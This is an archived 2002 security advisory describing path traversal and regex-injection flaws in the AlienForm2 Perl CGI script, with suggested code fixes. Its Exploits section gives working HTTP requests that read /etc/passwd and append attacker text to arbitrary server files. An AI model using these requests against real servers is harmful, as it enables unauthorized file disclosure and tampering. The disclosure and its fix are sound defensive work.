TUCoPS :: Web :: Apps :: web5456.htm

AlienForm2 server file access (reading, writing)
14th Jun 2002 [SBWID-5456]
COMMAND

	AlienForm2 server file access (reading, writing)

SYSTEMS AFFECTED

	AlienForm2 revision 1.5

PROBLEM

	Nick Cleaton [nick@cleaton.net] found following:
	

	AlienForm2 by Jon Hedley is a template driven form processing  Perl  CGI
	script. It is normally installed as af.cgi  or  alienform.cgi.  Template
	files on the server are used to  configure  the  format  of  the  output
	document, the name of a log file and the format of the  data  to  append
	to the log file.
	

	AlienForm2 is published under a  licence  that  does  not  allow  me  to
	reproduce parts of it here without permission, which I have been  unable
	to obtain. This advisory is best read in  conjunction  with  a  copy  of
	af.cgi.
	

	The paths to the template files come from CGI inputs, and a flaw in  the
	code that cleans up those inputs allows any file on  the  server  to  be
	used as a template file. The cleanup code replaces  bad  characters  and
	constructs with the empty string,  and  the  input  string  \".|./\"  is
	transformed by the cleanup code to \"../\".
	

	The path cleanup code can be found on lines 185, 186,  197  and  198  of
	af.cgi.
	

	The name of a CGI input in square brackets in  a  template  is  replaced
	with the value of that input. The regular expression which performs  the
	replacement is not resilient to  regular  expression  metacharacters  in
	the name of a CGI input, allowing an attacker to take  full  control  of
	the contents of a template after CGI input substitution.
	

	The CGI input substitution code can be found on line 246 of af.cgi.
	

	

	 Exploits

	 ========

	

	Arbitrary file disclosure:
	

	

	GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F

	.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd

	

	

	File writing:
	

	This proof of concept exploit appends the text \"hello  there\"  to  the
	file /tmp/foo on the web server. It requires the existence of  the  file
	/tmp/passwd, consisting of just the three lines:
	

	

	root:*:0:0:Charlie &:/root:/bin/csh

	httpd:*:1004:1004:Apache daemon:/:/nonexistent

	nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

	

	

	This exploit can be readily adapted to use any  other  file  of  two  or
	more  lines  in  place  of  /tmp/passwd,   and   the   file   disclosure
	vulnerability could be used to find a suitable file. That process  could
	be automated.
	

	

	GET /cgi-bin/af.cgi?_out_file=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.

	%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Fpasswd&x9|^root.*|x9=.|.%2F.|.

	%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Ffoo&x9|^http

	d.*|x9=hello+there&x9|^nobody.*%0A|x9=

	

SOLUTION

	 Suggested Fix

	 =============

	

	On lines 185 and 197, change [] to [_]
	

	On lines 186 and 198, change // to /_/
	

	On lines 246 and 248, change $key to \\Q$key\\E

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH